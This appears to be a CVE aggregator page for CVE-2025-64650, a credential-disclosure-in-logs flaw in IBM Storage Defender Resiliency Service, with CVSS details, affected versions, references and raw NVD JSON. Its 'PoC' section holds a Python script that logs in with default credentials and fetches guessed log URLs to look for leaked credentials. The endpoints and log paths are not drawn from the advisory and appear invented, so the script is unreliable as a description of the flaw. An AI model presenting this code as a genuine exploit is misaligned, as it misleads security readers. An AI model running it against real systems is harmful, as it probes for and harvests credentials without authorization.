CVE-2025-64650

Description

IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.18 could disclose sensitive user credentials in log files.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:storage_defender_resiliency_service:*:*:*:*:*:*:*:* - VULNERABLE

IBM Storage Defender Resiliency Service 2.0.0

IBM Storage Defender Resiliency Service 2.0.1

IBM Storage Defender Resiliency Service 2.0.2

IBM Storage Defender Resiliency Service 2.0.3

IBM Storage Defender Resiliency Service 2.0.4

IBM Storage Defender Resiliency Service 2.0.5

IBM Storage Defender Resiliency Service 2.0.6

IBM Storage Defender Resiliency Service 2.0.7

IBM Storage Defender Resiliency Service 2.0.8

IBM Storage Defender Resiliency Service 2.0.9

IBM Storage Defender Resiliency Service 2.0.10

IBM Storage Defender Resiliency Service 2.0.11

IBM Storage Defender Resiliency Service 2.0.12

IBM Storage Defender Resiliency Service 2.0.13

IBM Storage Defender Resiliency Service 2.0.14

IBM Storage Defender Resiliency Service 2.0.15

IBM Storage Defender Resiliency Service 2.0.16

IBM Storage Defender Resiliency Service 2.0.17

IBM Storage Defender Resiliency Service 2.0.18

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-64650 PoC - IBM Storage Defender Log Credential Disclosure
# This PoC demonstrates checking for exposed credentials in logs

import requests
import re
import sys
from urllib.parse import urlparse

def check_credential_leakage(target_url, credentials=None):
    """
    Check if IBM Storage Defender logs contain sensitive credentials
    """
    if not credentials:
        credentials = {
            'username': 'admin',
            'password': 'password123'
        }
    
    # Simulate authentication request
    auth_endpoint = f"{target_url}/api/auth/login"
    
    try:
        # Step 1: Attempt login to trigger credential logging
        response = requests.post(auth_endpoint, json=credentials, timeout=10)
        
        # Step 2: Access log files that may contain credentials
        log_paths = [
            f"{target_url}/logs/application.log",
            f"{target_url}/logs/auth.log",
            f"{target_url}/logs/system.log"
        ]
        
        exposed_creds = []
        for log_path in log_paths:
            try:
                log_response = requests.get(log_path, timeout=10)
                if log_response.status_code == 200:
                    # Search for credential patterns in logs
                    if credentials['username'] in log_response.text:
                        exposed_creds.append({
                            'path': log_path,
                            'credential': credentials['username']
                        })
            except:
                pass
        
        return {
            'vulnerable': len(exposed_creds) > 0,
            'exposed_credentials': exposed_creds
        }
    except Exception as e:
        return {'error': str(e)}

if __name__ == '__main__':
    if len(sys.argv) > 1:
        target = sys.argv[1]
        result = check_credential_leakage(target)
        print(result)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64650
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64650
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64650/
[4] VulDB https://vuldb.com/cve/CVE-2025-64650
[5] https://www.ibm.com/support/pages/node/7253864

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64650", "sourceIdentifier": "[email protected]", "published": "2025-12-08T22:15:52.990", "lastModified": "2025-12-10T19:56:40.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.18 could disclose sensitive user credentials in log files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:storage_defender_resiliency_service:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0", "versionEndIncluding": "2.0.18", "matchCriteriaId": "E32F0D66-A3DF-4C92-938D-DC043B033990"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7253864", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}